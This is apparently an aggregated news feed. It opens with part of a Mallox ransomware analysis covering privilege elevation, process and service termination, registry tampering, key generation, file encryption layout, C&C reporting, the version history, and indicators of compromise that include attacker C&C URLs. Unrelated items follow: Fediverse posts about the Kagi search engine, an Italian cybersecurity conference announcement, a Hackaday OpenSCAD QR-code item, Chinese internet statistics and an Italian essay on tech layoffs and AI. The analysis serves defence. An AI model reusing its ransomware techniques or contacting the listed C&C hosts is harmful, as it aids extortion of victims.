Two new arguments have been added compared to the first version, but none of the new or old arguments work in this variant. Any arguments passed via the command line are in fact checked for existence through the PathFileExistsW function, so the ransomware apparently only accepts file paths as arguments: “mallox.exe <path1> <path2>…. <pathN>”.

Any arguments that are not paths, including “-p”, “-d”, “-l”, “-path”, “-queue”, result in an error. If the correct paths are passed, the ransomware checks whether it is running with administrative privileges and, if so, it encrypts the files at these paths. If running without administrator permissions, it attempts to elevate its privileges by restarting using ShellExecuteW with the verb runas, used to run the application as the administrator.

Preparing for encryption


Mallox sets the computer’s power scheme to High Performance, obviously in order to increase the performance and speed of the encryption process.

Pseudocode to change the power scheme
Pseudocode to change the power scheme

In this version, the Trojan contains a new function for terminating active processes via the TerminateProcess WinAPI function so as to keep them from blocking user files or interfering with the encryption process. The list of terminable process names refers mainly to databases, such as SQL Server, Oracle Database, Pervasive PSQL and MySQL.

Another new feature concerns services: the Trojan uses the Service Control Manager to disable and stop services using the ChangeServiceConfig and ControlService functions.

If the user tries to shut down or restart the operating system, Mallox attempts to prevent this. Using the ShutdownBlockReasonCreate function, the ransomware makes the OS display a threatening message about the possibility of file damage unless the user aborts the shutdown or reboot.

Threat message about file damage
Threat message about file damage

Before starting encryption, the Trojan modifies the registry keys of the HKEY_LOCAL_MACHINE hive to disable UAC and hide the Shut Down, Restart and Sign Out buttons.

Cryptography


The key generation scheme in the recent version shows significant changes. Presumably, the algorithm was altered by the Mallox developers in an attempt to fix vulnerabilities that allowed decrypting victims’ files without the attackers’ private key in earlier versions of the malware.

In this latest version, three values embedded in the code are used to generate a shared secret: two public ECC master keys (master_public_key_1, master_public_key_2) generated on the attacker’s side and a hardcoded 12-byte array. The resulting new scheme is presented below:

  • When the Trojan starts, it generates 56 random bytes via CTR_DRBG.
  • Twelve bytes in the middle of this 56-byte array are replaced with the hardcoded bytes.
  • The resulting 56 bytes are hashed with SHA-256.
  • Using ECDH (curve25519) with the result of hashing and master_public_key_1, the Trojan generates a user_private_key.
  • Using ECDH (curve25519) with the user_secret_key and the elliptic curve base point, the Trojan generates a user_public_key.
  • Finally, again, using ECDH (curve25519) with user_secret_key and master_public_key_2, the Trojan generates a share_key shared secret.
  • Later, this share_key is hashed with SHA-256.

Below is a simplified diagram of this.

Key generation scheme in the most recent Mallox version
Key generation scheme in the most recent Mallox version

The file encryption algorithm has also changed: now files are encrypted using AES-256 in GCM mode. File keys are generated with ISAAC PRNG, seeded by the output of the BCryptGenRandom API function combined with Mersenne Twister PRNG. The file keys, as before, are encrypted using AES-128 in CTR mode, and the key for that is still the first half of the SHA-256 hashed share_key.

The technical buffer added at the end of each encrypted file has been expanded. Its beginning and end are indicated by the markers 0x02010201 and 0x04030403, shown in green in the image below. In this version, the ransomware encrypts the first 60% of the file — the total number of encrypted file chunks is shown in pink. Compared to the original version, the chunks have a size of 0x800000 bytes, are located next to each other and are encrypted entirely without further division. Purple stands for the size of the original file, red for the encrypted file key and IV for AES-256-GCM. The blue part is IV for AES-128-CTR, which is used to encrypt file keys. The orange part is the user_public_key.

Technical buffer structure saved at the end of the file in the latest Mallox version
“Technical buffer” structure saved at the end of the file in the latest Mallox version

Communication with the attackers’ C&C server


First, the ransomware gets the external IP address of the encrypted device via a third-party public service. Then it collects information about the user, device, network, disks and files and sends it to the attacker’s C&C server with an HTTP POST request.

Data sent to the attacker's C&C
Data sent to the attacker’s C&C

If all data is received and processed successfully, the server responds with “Successfully_added”.

Server response
Server response

Timeline of Mallox versions


We have been tracking a large number of samples since the very first version of Mallox appeared in 2021. During this time, more than 700 different samples have been found, which we have divided into 12 versions for convenience. This division is based on changes in ransomware functionality or cryptography. Please note that the Trojan samples do not contain any version numbers internally. In the tables below, we provide a brief description of changes introduced in each Mallox version along with the MD5 of one of the samples belonging to this version.

Sample hash (MD5)VersionPE timestampComment
9b772efb921de8f172f21125dd0e0ff7115 May 2021Earliest found version
79b60f8b5052a9d4cc0c92c2cdc47485220 Nov 2021The notes became generic, presumably as an initial step in a transition to RaaS distribution.
e713f05a62914496eef512a93a611622317 Feb 2022Fixed a vulnerability in the encryption scheme that allowed files to be decrypted without the attackers’ private keys.
3829a09bca120206883539eb33d5531149 May 2022Disabled self-spreading. The vulnerability is still fixed.
a8e214683307adaff39783dc656b398a5 (gen)10 Jun 2022Removed the vulnerability fix introduced in version 3. Added a new public key generation scheme using data from the device — we refer to this scheme as “generated key”. Added a new “-path” argument. Enabled self-spreading again.
ac1a255e5c908f12ef68a45fc0043b166 (emb)17 Jul 2022Removed the vulnerability fix introduced in version 3. Added a new public key generation scheme, using an embedded key — we refer to this scheme as “embedded key”.

Starting with versions 5 and 6, all the subsequent versions through 11 were divided into two key generation schemes: “generated key” (gen) and “embedded key” (emb). These versions were used in parallel, and if some changes were made to one of these variants, then the other variant with the same changes would soon appear, sometimes on the same day. Later in this report, we will describe both methods in detail.

Hash (MD5)VersionPE timestampComment
b1b42fa300d8f43c6deb98754caf09347 (gen)25 Oct 2022Added registry modification functions and an OS shutdown message.
Completed the transition to a RaaS distribution scheme with support for affiliate IDs hardcoded in the Trojan’s body and reported to C&C via the HTTP parameter “user=”.
3762f98a55f0ec19702f388fc0db74e28 (emb)31 Oct 2022Similar to the previous one, but with a different key generation scheme.
6bd93817967cdb61e0d7951382390fa09 (gen)18 Apr 2023Added a new argument: “-queue”.
c494342b6c84f649dece4df2d3ff103110 (emb)18 Apr 2023Similar to the previous one, but with a different key generation scheme.
16e708876c32ff56593ba00931e0fb6711 (emb)25 Sep 2023Switched to an x64 version: later versions are also x64, while all earlier versions were x86. Added new features: power scheme, disabling UAC, hiding Shutdown/Reboot/Sign out buttons, etc. Switched to a new format for arguments: requires valid file paths as arguments. Also, instead of ChaCha, file content is now encrypted with AES-256-GCM.
d32a3478aad766be96f0cdbda1f1009111 (gen)26 Sep 2023Similar to the previous one, but with a different key generation scheme.
e98b3a8d2179e0bd0bebba42735d11b7126 Mar 2024Fixed a vulnerability in the key generation schemes by adopting a new, cryptographically secure scheme. Added the cryptographic random number generator CTR_DRBG (AES based).

There is one version that stands out from this classification. We dubbed it 1F. The only two samples belonging to this version were discovered in June 2023 and February 2024. Despite the discovery dates, they are almost exactly the same as the first version, but with a fixed vulnerability in the cryptographic scheme. What is curious, this fix differs from the convoluted encryption schemes seen in versions 3, 4 and 12. Instead, it is a small local fix using the cryptographically secure SystemFunction036 (RtlGenRandom) function for seed generation.

Hash (MD5)VersionPE timestampComment
98c7f6b6ddf6a01adb25457e9a3c52b81F5 Jun 2023Fixed a vulnerability in the version 1 key generation scheme using RtlGenRandom.
b13a1e9c7ef5a51f64a58bae9b508e621F23 Feb 2024Exactly the same as the previous one.
Cryptographic scheme in v5 and above: the “generated key” variant


This scheme uses data from the device to populate an array with a maximum size of 56 bytes, from which a user ECC private key is obtained. The array is generated based on the functions GetVolumeInformationW, GetFileTime, GetComputerNameA, and the CPUID instruction.

Bytes countEntropy sourceComment
4GetVolumeInformationW
16__cpuid
12Embedded in codeVaries between samples
8GetFileTime
<= 16GetComputerNameACan be less than 16 bytes

The rest of the scheme contains three curve25519 calls, similar to the recent version (12), but unlike that, the scheme described in this paragraph is not cryptographically secure.

Shared key generation, generated key
Shared key generation, “generated key”, v5+

Cryptographic scheme in v6 and above: the “embedded key” variant


In this case, no random value generation is used to calculate the shared secret share_key. The user_private_key is hardcoded in the Trojan’s body, and the rest of the scheme has not changed compared to the first version. This is also a cryptographically non-secure scheme.

Shared key generation, embedded key
Shared key generation, “embedded key”, v5+

Negotiation portal and DLS (data leak site)


When encrypting a victim’s files Mallox creates a ransom note commonly named “HOW TO BACK FILES.txt”, “HOW TO RESTORE FILES.txt”, “RECOVERY INFORMATION.txt”, “FILE RECOVERY.txt” or some such. In the note, the threat actors instruct the victim about the ways to communicate with the attackers to negotiate the ransom payment: by visiting a specified TOR site (negotiation portal) and logging in with the victim ID, or by sending an email message to a specified address.

Upon authenticating with the negotiation portal, the victim is presented with a page containing information about their infection case:

  • Status: whether the exfiltrated data has been published
  • Ransom price in USD and BTC
  • Payment addresses for BTC and TETHER TRC-20
  • Answers to frequently asked questions
  • Chat widget to talk to the ransomware operator

Negotiation portal (victim page)
Negotiation portal (victim page)

The main page of the Mallox data leak site, which resides on the same domain as the negotiation portal, contains the list of victim companies. Countdown timers indicate the remaining time until the stolen data from each company is published in case the victim fails to pay up.

Mallox data leak site: the home page
Mallox data leak site: the home page

The information about the companies that apparently refused to cooperate is provided on a new page when the user clicks “View”. This page lists some details, such as the victim’s approximate revenue, the total volume of stolen data, links to download archives allegedly containing some or all of the exfiltrated files, and the password to unpack the archives.

Page with victim company details
Page with victim company details

For additional publicity and promotion of their affiliate program, the Mallox threat actors maintain an X account that posts regular updates about the group’s new victims and shares links to download new portions of stolen data.

Mallox profile on X
Mallox profile on X

Victims


The geographical distribution of unique KSN users who encountered the Mallox ransomware shows that the affiliates of the RaaS do not restrict their activities to a specific country and apparently aim to attack vulnerable companies anywhere these are located. That being said, some regions tend to be a more desirable target for Mallox extortionists. The countries that have attracted the most infection attempts are Brazil, Vietnam and China.

Geographical chart of Mallox attack attempts (download)

Conclusions


Our report provides a comprehensive overview of the Mallox ransomware, its characteristics, the history of its evolution, and the potential impact it can have on victims. By understanding the nature of Mallox ransomware and implementing appropriate security measures, companies and organizations can better safeguard their digital assets and minimize the risk of falling victim to this malicious software.

Our recommendations for maximizing your organization’s security:

  • Do not expose remote desktop services, such as RDP, to public networks unless absolutely necessary, and always use strong passwords.
  • Make sure commercial VPN solutions and other server-side software are always up to date as exploitation of this type of software is a common ransomware infection vector. Always keep client-side applications up to date.
  • Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections. Back up data regularly. Make sure you can quickly access it in an emergency. Use the latest Threat Intelligence information to stay up to date on the latest TTPs used by threat actors.
  • Use Managed Detection and Response services to help identify and stop an attack in the early stages, before the attackers achieve their ultimate goals.
  • To protect the corporate environment, educate your employees. Dedicated training courses can help, such as those provided in the Kaspersky Automated Security Awareness Platform.
  • Use complex security solutions, combining endpoint protection and automated incident response features, such as Kaspersky NEXT.


IoC


MD5

9b772efb921de8f172f21125dd0e0ff7

79b60f8b5052a9d4cc0c92c2cdc47485

e713f05a62914496eef512a93a611622

3829a09bca120206883539eb33d55311

a8e214683307adaff39783dc656b398a

ac1a255e5c908f12ef68a45fc0043b16

b1b42fa300d8f43c6deb98754caf0934

3762f98a55f0ec19702f388fc0db74e2

6bd93817967cdb61e0d7951382390fa0

c494342b6c84f649dece4df2d3ff1031

16e708876c32ff56593ba00931e0fb67

d32a3478aad766be96f0cdbda1f10091

e98b3a8d2179e0bd0bebba42735d11b7

98c7f6b6ddf6a01adb25457e9a3c52b8

b13a1e9c7ef5a51f64a58bae9b508e62

URLs

91.215.85.142%2FQWEwqdsvsf%2Fap.php

whyers.io%2FQWEwqdsvsf%2Fap.php


securelist.com/mallox-ransomwa…



Welcome to Kagi, the paid search engine full of surprises, which today opened an account in the Fediverse!

@Fediverse

@Kagi HQ is the very interesting project for a paid search engine, without tracers and with an accuracy in identifying results such as to exclude all Google spam.

Those who believe that #Kagi's costs are too high, should reflect on a small detail: if Google lets all those searches be done "for free", who pays those costs? The answer might seem simple: "advertisers".

Yet this would be an incomplete answer: like saying that rain is caused by clouds!

In reality, those costs are paid by users, by being milked and letting Google extract their "value", a bit like in the human farm in Matrix...

We first heard about Kagi on the @Le Alternative website (unfortunately, since then the prices have increased a lot, raising many doubts about the sustainability of the project) and recently Cory Doctorow also talked about it on @Cory Doctorow AFK TIL MID-SEPT

In any case, we are really happy that a service like Kagi's, effective and respectful of users' privacy, has landed here in the #Fediverse.

mastodon.social/@kagihq/113074…


Hello, Fediverse! We're Kagi, and we're on a mission to create a friendlier, more human-centric internet that has the users' best interest in mind.

Our core product is a search engine that is ad-free, tracking-free, and fully supported by our users. We've worked hard to deliver a high-quality, fast, and reliable search experience without compromising user privacy: kagi.com/

Excited to engage with the community here.

#Search #Privacy #AdFree


in reply to Cybersecurity & cyberwarfare

The number of searches i get for the $5 should roll over to the next month if i dont use them all. No way i will be able to convince anyone to switch to this when they will run out of searches every month


Diamo il benvenuto a Kagi, il motore di ricerca a pagamento e pieno di sorprese, che oggi è entrato nel Fediverso!

@Le Alternative

@Kagi HQ è l'interessantissimo progetto per un motore di ricerca a pagamento, senza traccianti e con un'accuratezza nell'individuazione dei risultati tale da escludere tutto lo spam di Google.

Chi crede che i costi di #Kagi siano troppo elevati, dovrebbe riflettere su un piccolo dettaglio: se Google lascia fare "gratis" tutte quelle ricerche, chi paga quei costi? La risposta potrebbe sembrare semplice: "gli inserzionisti".

Eppure questa sarebbe una risposta incompleta: come dire che la pioggia è causata dalle nuvole!

In realtà quei costi li pagano gli utenti, facendosi mungere e lasciando che Google estragga il loro "valore", un po' come nella human farm di Matrix...

Abbiamo sentito parlare di Kagi per la prima volta sul sito de @Le Alternative (purtroppo da allora i prezzi sono aumentati molto, facendo sorgere molti dubbi sulla sostenibilità del progetto) e recentemente ne ha parlato anche Cory Doctorow su @Cory Doctorow AFK TIL MID-SEPT.

In ogni caso siamo davvero contenti che un servizio come quello di Kagi, efficace e rispettoso della privacy degli utenti, sia approdato qui nel #Fediverso

mastodon.social/@kagihq/113074…


Hello, Fediverse! We're Kagi, and we're on a mission to create a friendlier, more human-centric internet that has the users' best interest in mind.

Our core product is a search engine that is ad-free, tracking-free, and fully supported by our users. We've worked hard to deliver a high-quality, fast, and reliable search experience without compromising user privacy: kagi.com/

Excited to engage with the community here.

#Search #Privacy #AdFree


Anomaly ☑️ doesn't like this.

in reply to Poliverso - notizie dal Fediverso ⁂

perché non usare DuckDuckGo? Privacy senza compromessi.

In alternativa c'è anche il browser Brave

in reply to MuhammadPython

@MuhammaPy perché non a tutti piace il fatto che DuckDuckGo utilizza, principalmente, i risultati di Bing. Ultimamente sto usando la ricerca di Brave (che pare essere indipendente) e in italiano è migliorata moltissimo.
in reply to MuhammadPython

@MuhammadPython perché onestamente con duckduck go non si riesce a trovare mai una mazza... 😅

Ci sono diversi servizi che integrano motori di ricerca esistenti e in alcuni casi aggiungono un proprio sistema, ma un aspetto importante di Kagi è che le ricerche mostrano davvero quello che hai chiesto. Sembra banale, ma oggi non lo è più tanto perché quando fai una ricerca su un qualsiasi motore di ricerca o carichi una vagonata di letame da cui spulciare quello che ti serve, oppure trovi pochi risultati rilevanti.


@Le Alternative




Red Hot Cyber Conference 2025. La Quarta edizione a Roma l’8 e il 9 Maggio


La Red Hot Cyber Conference è l’appuntamento gratuito annuale, creato dalla community di RHC, per far accrescere l’interesse verso le tecnologie digitali, l’innovazione e la consapevolezza del rischio informatico verso tutte le persone.

La nuova edizione della RHC Conference 2025 si svolgerà a Roma, nella stessa location dell’anno precedente, i Teatro italia nei giorni giovedì 8 e venerdì 9 maggio 2025. Il Teatro Italia si trova in Via Bari, 18 00161 Roma e può ospitare fino ad 800 persone. La location risulta distante:

  • 2 km dalla Stazione Termini o dall’Università La Sapienza, raggiungibile con una passeggiata a piedi di circa 20 minuti o con 6 minuti di Taxi;
  • 600 metri dalla stazione della Metro B di Piazza Bologna, raggiungibile con una passeggiata di 6 minuti a piedi o con 3 minuti di Taxi.


L’edizione del 2024


La terza edizione della Red Hot Cyber Conference si è svolta a Roma il 19 e 20 aprile 2024, registrando oltre 800 partecipanti effettivi e più di 1.200 iscrizioni complessive. Durante le due giornate, si sono tenuti workshop pratici ‘hands-on’, la competizione di hacking ‘Capture The Flag’ (CTF), e una conferenza in cui numerosi esperti italiani, provenienti sia dal settore privato che pubblico, hanno condiviso le loro conoscenze sul palco.
19073221Persone in fila per l’accoglienza alla Red Hot Cyber Conference 2024 19073223Capture The Flag (CTF) alla Red Hot Cyber Conference 2024 19073225Ragazzi che giocano alla Capture The Flag (CTF) alla Red Hot Cyber Conference 2024 19073227Platea alla Red Hot Cyber Conference 2024 19073229Pranzo alla Red Hot Cyber Conference 2024 19073231Una inquadratura dei partecipanti alla CTF sulla seconda scalinata del teatro 19073233Una inquadratura dei partecipanti alla Capture The Flag Una delegazione del team di "PizzaFeijoada" ritirano la maglietta "The Winner is me" della Capture The Flag della Red Hot Cyber Conference 2024Una delegazione del team di “PizzaFeijoada” ritirano la maglietta “The Winner is me” della Capture The Flag della Red Hot Cyber Conference 2024 19073235Ingresso di SPOT della Boston Dynamics alla Red Hot Cyber Conference 2024 19073237Workshop “hands-on” alla Red Hot Cyber Conference 2024 19073239Accoglienza alla Red Hot Cyber Conference 2024 Una foto dello STAFF Al completo della Red Hot Cyber Conference 2024Una foto dello STAFF Al completo della Red Hot Cyber Conference 2024Alcune immagini evocative dell’evento del 2024
Di seguito potete trovare una serie di link che mostrano l’evento dello scorso anno, compresi i video degli interventi.


Come si articolerà la Red Hot Cyber Conference 2025


Il programma della Red Hot Cyber Conference 2025 sarà articolato in due complete giornate distinte.

A differenza degli altri anni, i workshop si terranno nella sola giornata di Giovedì 8 Maggio, mentre la Conferenza sarà l’unica protagonista del Venerdì 9 Maggio. Di seguito il programma (ancora in bozza) delle due giornate.

8 Maggio

  • Workshop “hands-on”: In tarda mattinata verranno avviati i Workshop pratici, incentrati nell’approccio “hands-on”. Durante questi workshop, verranno affrontati temi quali ethical hacking, intelligenza artificiale e altro ancora. I partecipanti, muniti del proprio laptop, avranno l’opportunità di ascoltare i workshop e poi cimentarsi nello svolgere gli esercizi pratici supervisionati dai nostri esperti per poter toccare con mano la tecnologia. I workshop termineranno la sera dell’8 maggio;
  • Capture The Flag (CTF): Nel pomeriggio, partirà anche la Capture The Flag (CTF) che terminerà il 9 Maggio alle ore 17:00. Si tratta di una competizione tra hacker che si terrà sia online che presso il Teatro Italia. I partecipanti presenti presso il Teatro Italia (i quali avranno un posto dedicato per poter partecipare), avranno la possibilità di sfidarsi in “flag fisiche” appositamente progettate per attacchi locali RF/IoT. Tali “flag fisiche”. Queste attività forniranno la possibilità di accumulare maggiore punteggio per salire nella classifica, qualora gli obiettivi prefissati vengano raggiunti. Sarà possibile cimentarsi nelle flag fisiche in entrambe le giornate.

9 maggio

  • 9 Maggio – Red Hot Cyber Conference: La giornata sarà interamente dedicata alla RHC Conference, un evento di spicco nel campo della sicurezza informatica. Il programma prevede un panel con ospiti istituzionali che si terrà all’inizio della conferenza. Successivamente, numerosi interventi di esperti nel campo della sicurezza informatica si susseguiranno sul palco fino alle ore 19:00 circa, quando termineranno le sessioni. Prima del termine della conferenza, ci sarà la premiazione dei vincitori della Capture The Flag prevista per le ore 18:00. Si precisa che i Workshop non saranno disponibili nella giornata di Venerdì 9 di maggio ma solo nella giornata di Giovedì 8 di Maggio.


Il Programma Sponsor per la Red Hot Cyber Conference 2025


Come per il 2024 sarà presente la possibilità di adesione come “sponsor sostenitore”. Si tratta delle prime 6 aziende che crederanno in questa iniziativa e che permetteranno a Red Hot Cyber di avviare i lavori relativi alla conferenza. Inoltre una sola tra queste potrà aderire alla “Workshop Sponsorship”, che permetterà allo sponsor di avere un ruolo determinante nell’evento e collaborando strettamente con Red Hot Cyber per organizzare la giornata di Giovedì 8 Maggio, dedicata ai WorkShop, lo scorso anno sostenuta da Accenture Italia. Tali workshop in modalità “hands-on” consentiranno di far avvicinare i ragazzi di “toccare con mano” la tecnologia.

Saranno come di consueto presenti i 3 livelli di sponsorizzazione che sono rispettivamente Platinum, Gold e Silver. Abbinati alla sponsorizzazione della conferenza, sarà presente un pacchetto di Advertising che permetterà allo sponsor di disporre di una serie di vantaggi all’interno del circuito Red Hot Cyber.

Per avere accesso al “Programma Sponsor” e al “Media Kit” e alle informazioni che riassumono i vantaggi della sponsorizzazione dell’evento, scrivete a sponsor@redhotcyber.com

L'articolo Red Hot Cyber Conference 2025. La Quarta edizione a Roma l’8 e il 9 Maggio proviene da il blog della sicurezza informatica.



OpenSCAD Library Creates QR Codes on the Fly


19071510

If you’ve been reading Hackaday for awhile, you’ll know we’re big fans of OpenSCAD around these parts. There’s a number of reasons it’s a tool we often reach for, but certainly one of the most important ones is its parametric nature. Since you’re already describing the object you want to generate with code and variables, it’s easy to do things like generate an arbitrary number of cloned objects by using a for loop.

There are a number of fantastic OpenSCAD libraries that explore this blurred line between code and physical objects, and one that recently caught our eye is scadqr from [xypwn]. The description says it lets you “Effortlessly generate QR codes directly in OpenSCAD”, and after playing around with it for a bit, we have to agree.

How effortlessly are we talking about? Take a look:

19071512

Yeah, that’s pretty damn easy. Even better, there’s no alphabet soup of libraries or APIs going on behind the scenes here. It’s just a single file you include in your OpenSCAD script. In fact, you don’t even need to go that far. As [xypwn] explains, the source for the library itself is just the one file, so you could just copy its code right into your project if you didn’t want to have to pull it in as an include. That could be especially handy if you’re deploying this code somewhere that doesn’t let you pull in external files, like Thingiverse’s Customizer.

Now, there’s all sorts of reasons you might want to create a QR code from within OpenSCAD. But one of first ones that popped into our heads is for the purposes of part identification. Forget simple version numbers, this library would let you physically embed all sorts of ancillary data into your printed components, like who rendered them and at what time. Or perhaps each printed part in an assembly could have a unique QR code that pointed to its respective page in your online documentation.

Got any interesting ideas? Let us know in the comments.


hackaday.com/2024/09/04/opensc…



La Cina ha quasi 1,1 miliardi di utenti Internet, con un tasso di penetrazione pari al 78%


Un ultimo rapporto proveniente dalla Cina mostra che a giugno 2024 il numero di utenti Internet cinesi è cresciuto di nuovo, raggiungendo quasi 1,1 miliardi di persone (1,09967 milioni), con un aumento di 7,42 milioni rispetto a dicembre 2023, e il tasso di penetrazione di Internet ha raggiunto il 78,0% .

China Central Television News ha riferito che il China Internet Network Information Center (CNNIC) ha pubblicato giovedì (29 agosto) il 54esimo “Rapporto statistico sullo stato di sviluppo di Internet in Cina”, dimostrando che le risorse di rete di base come nomi di dominio e indirizzi IP continuano ad arricchirsi, fornendo una piattaforma per Internet, il funzionamento industriale e uno sviluppo vigoroso.

In primo luogo, la diffusione e l’applicazione su larga scala di IPv6 continuano ad avanzare. A giugno, il numero di indirizzi IPv6 era di 69.080 blocchi/32, con un aumento dell’1,5% rispetto a dicembre 2023, numero di utenti IPv6 attivi 794 milioni. Il traffico IPv6 di Action Network rappresenta il 64,56% e il tasso di supporto IPv6 dei principali siti Web commerciali e delle applicazioni Internet mobili raggiunge il 90%.

In secondo luogo, il numero di nomi di dominio di primo livello nel paese è al primo posto nel mondo per 10 anni consecutivi. A giugno, il numero totale di nomi di dominio in Cina ammontava a 31,87 milioni, di cui il numero di nomi di dominio nazionali di primo livello “.CN” era di 19,56 milioni, pari al 61,4% .

Il “Rapporto” mostra che nella prima metà dell’anno, l’infrastruttura dell’informazione digitale della Cina ha continuato a essere stabile e che i servizi digitali a beneficio delle persone sono stati ampiamente forniti, promuovendo di fatto la crescita degli utenti.

Gli adolescenti e le “persone dai capelli bianchi” diventano nuove fonti di


In primo luogo, gli adolescenti e le “persone dai capelli bianchi” sono fonti importanti per l’aumento di nuovi utenti. Con il continuo miglioramento dei servizi digitali per gli anziani e l’accelerata divulgazione delle applicazioni di rete, sono state adottate molteplici misure per incoraggiare sempre più persone a continuare a “connettersi con Internet”.

I dati mostrano che la Cina ha 7,42 milioni di nuovi utenti Internet tra adolescenti tra i 10 e i 19 anni e “persone dai capelli bianchi”. Tra questi, gli adolescenti rappresentavano il 49,0% e i gruppi di età compresa tra 50 e 59 anni e over 60 rappresentavano rispettivamente il 15,2% e il 20,8% dei nuovi utenti

In secondo luogo, i brevi video sono diventati un’importante applicazione per i nuovi utenti della rete per “connettersi con Internet”. Tra i nuovi utenti, l’intrattenimento e le esigenze sociali sono gli elementi più motivanti ad andare online.

Tra le applicazioni online utilizzate da questo gruppo per la prima volta, le applicazioni che ospitano video brevi rappresentano il 37,3%. Inoltre, anche la messaggistica istantanea mostra una certa capacità di attrarre nuovi utenti, rappresentando il 12,6% dei nuovi utenti della rete che utilizzano per la prima volta applicazioni online.

L'articolo La Cina ha quasi 1,1 miliardi di utenti Internet, con un tasso di penetrazione pari al 78% proviene da il blog della sicurezza informatica.



Tecnologia moderna, tra Bolle, Licenziamenti e Intelligenza Artificiale. Cosa sta accadendo?


Autore: Kim ALLAMANDOLA

Da oramai qualche anno si legge di grandi nomi dell’IT che licenziano centinaia di lavoratori e molte ipotesi sono state fatte sulle ragioni di questo fenomeno, vediamo di far chiarezza disegnando un quadro generale.

la storia che si ripete, andiamo a ieri


Torniamo indietro nel tempo per questo, allo Xerox PARC dove nacque il desktop moderno, prendiamo questo video pubblicitario d’allora, concedendoci il minuto di durata ed immaginandoci dei cittadini d’allora, immaginiamo poi un dialogo tra un top manager

youtube.com/embed/M0zgj2p7Ww4?…

S
Abbiamo creato il futuro! Una rivoluzione epocale! Si può finalmente comunicare per iscritto in uno schiocco di dita, ovvero un click, attraverso il globo; si può cercare in immense moli di informazione testuale le singole parole che vogliamo trovando subito ogni cosa in archivi sterminati; si può rappresentare con grafici, mappe, animazioni, immagini, tabelle, formule, ogni informazione per comprenderla senza sforzo!

M
uh, ok, stupendo, vediamo, vediamo!

S
con questa semplice macchina da scrivania, dall’ufficio ma anche da casa possiamo far tutto ciò

M
perbacco! Quanto costa? Quanto tempo ci vuole per realizzarlo?

S
beh, il desktop costa quanto un appartamentino in centro [manager solleva un sopracciglio] e possiamo produrne tot al mese; per creare la rete mondiale ci vorrà un 20 anni ed il budget di un paio di potenze mondiali…

M
Ah, ok, le faremo sapere… INFERMIERIIIIII!!!

Chiudendo il siparietto guardate il calendario, stimate a spanne quanto s’è speso da allora per far computer e reti: quel che al tempo suonava al profano una follia si è realizzato, con i costi immensi sopra scritti, ma allora era fuori mercato e per questo la Xerox fallì1. Il desktop all’epoca non l’aveva nessuno quindi poter scrivere email tra 5 persone al prezzo d’un appartamento in centro non era eccitante, il grosso dell’informazione era su carta, quindi la capacità di cercare in banche dati che non c’erano ancora e spender ulteriori enormi cifre ed anni di lavoro per crearle non era certo d’aiuto. Era un prodotto concreto, ma fuori dal laboratorio era solo un’idea, un sogno.

torniamo ad oggi


Oggi siamo in una situazione simile, il grosso dell’IT “classico” è abbastanza diventato una commodity, es. banale Microsoft vs Alphabet:

  • Microsoft offre Outlook Mail, Alphabet GMail
  • Microsoft offre OneDrive, Alphabet Google Drive
  • Microsoft offre Teams, Alphabet Meet

Sono prodotti/servizi diversi, ma alla fine fan la stessa cosa e le differenze non sono così grandi. Vale anche per il retail, es. Amazon vs Aliexpress, vi sono differenze peculiari, ma all’ingrosso fan la stessa cosa con catalogo, tempi di spedizione ecc assai vicini, vale per produttori di stampanti, PC, … Ciò che è comune, diffuso si è appiattito, passata un lunga fase pionieristica, però quel che abbiamo non è “la perfezione”, ha dei limiti e dei problemi che cerchiamo di superare. La ricerca semantica, il santo graal dell’IT tutt’oggi mancante: i motori di ricerca sono da tempo eccezionali, permettono di trovare parole chiave in basi di dati sterminate ed in media troviamo quel che cerchiamo, però, però non è ancora la Biblioteca Universalis di Conrand Gessner del 1545, ovvero troviamo parole chiave in documenti altrui ma se vogliamo ad es. confrontare anno per anno i grandi incendi nel mondo o qualcuno ha scritto un articolo sul tema o troviamo informazioni su questi ma non “la risposta”, pur esistendo tutti i dati per generarla. Gli LLM, es. ChatGPT vorrebbero realizzare questo, un po’ lo fanno ma sono in effetti lontani dall’esser usabili su scala, non diversamente dai Desktop Xerox allora.

dove siamo


Il management di allora non lo capì, come non lo capisce quello d’oggi, perché non è facile visualizzare ciò che è possibile se non si conosce davvero lo strumento. Il tecnico che lo strumento conosce al contempo non riesce a mettersi nei panni “del resto del mondo” e non è infallibile, il credito di cui può godere non capendosi ha dei limiti.

Questo sta accadendo nel comparto tech: i giganti han esaurito la spinta propulsiva, non sono più pionieri ognuno col proprio spicchietto di mondo, Amazon per il retail, Google per la ricerca, Microsoft per “gli endpoint” (parlo da punto di vista del grosso della popolazione, che usa ma non conosce l’IT, il FLOSS ecc), Facebook per le reti di persone, Reddit per le discussioni tematiche ecc. Al tempo e a lungo han avuto successo, quindi han immense risorse economiche e le han investite un po’ ovunque, ma persa la peculiarità pionieristica sono in crisi. Han spinto l’IA come soluzione alla loro crisi, due direttrici, una testuale, sopra descritta, cui si aggiunge l’audio che alla fine diventa testo, una d’immagine ovvero video (sequenza di immagini), vista già da tempo a piccole dosi, ad es. il controllo bagagli abbandonati in stazione, ovvero la “partenza” da un’immagine di sfondo e l’analisi di cosa NON cambia per tot tempo da un filmato detratto lo sfondo originale, il bagaglio “abbandonato” appunto, tutte queste tecniche messe insieme portano potenzialmente ad un nuovo mondo in cui l’uomo può interfacciarsi con la voce con automi di vario tipo, come auto a guida autonoma “hey, auto, portami in Via del Piffero 51”, elettrodomestici ecc. È un sogno che gli artisti mostrano da decenni, che oggi comincia ad avvicinarsi, ma realizzarlo non è meno costoso né più rapido di realizzare il desktop ed internet (fisico e d’informazione digitale) d’oggi partendo dal PARC di allora. Un costo che manco i giganti sommati possono sostenere.

Han calcolato male, coll’ottimismo e la frenesia della Silicon Valley, han dato per vicino qualcosa che così lontano non è, ma manco così vicino, e pian piano ci si scotta le dita. Alcuni, nel software puro oscillano più rapidamente di altri, nell’hardware che necessita di fabbriche e costosi investimenti DEDICATI al singolo progetto si oscilla più lentamente e si soffre di più, perché un datacenter è un insieme di computer, può far di tutto, una fabbrica di auto ha delle macchine solo per produrre auto, adattarle non è banale.

